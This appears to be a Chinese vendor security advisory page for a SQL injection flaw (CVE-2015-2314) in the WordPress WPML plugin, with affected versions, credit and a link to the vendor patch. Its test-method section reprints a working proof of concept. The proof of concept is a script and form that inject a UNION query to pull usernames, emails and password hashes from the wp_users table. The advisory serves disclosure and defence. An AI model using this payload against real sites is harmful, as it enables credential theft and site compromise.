当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress WPML插件SQL注入漏洞(CVE-2015-2314)

     发表日期:2015-03-19 13:39:56

WordPress WPML插件SQL注入漏洞(CVE-2015-2314)
CVE-ID:CVE-2015-2314
发布日期:2015-03-05
更新日期:2015-03-18
受影响系统:
WordPress WPML < 3.1.9
详细信息:
 
WPML是创建多语言WordPress站点使用的行业标准。
 
 
 
WPML 3.1.9之前版本在实现上存在sql注入漏洞,通过在comments/feed的wp-link-ajax操作中,发送构造的HTTP Referer标头里的lang参数,远程攻击者利用此漏洞可执行任意sql命令。
 
 
来源:
Jouko Pynnonen (jouko@iki.fi)
参考信息:
http://www.securityfocus.com/archive/1/archive/1/534862/100/0/threaded
测试方法:
警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Jouko Pynnonen (jouko@iki.fi)提供了如下测试方法:
 
 
 
<script>
 
var union="select
 
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
 
wp_users";
 
if (document.location.search.length < 2)
 
document.location.search="lang=xx\' UNION "+union+" -- -- ";
 
</script>
 
 
 
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
 
<input type=hidden name=action value="wp-link-ajax">
 
<input type=submit>
 
</form>
解决办法:
厂商补丁:
 
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
 
 
http://wpml.org/2015/03/wpml-security-update-bug-and-fix/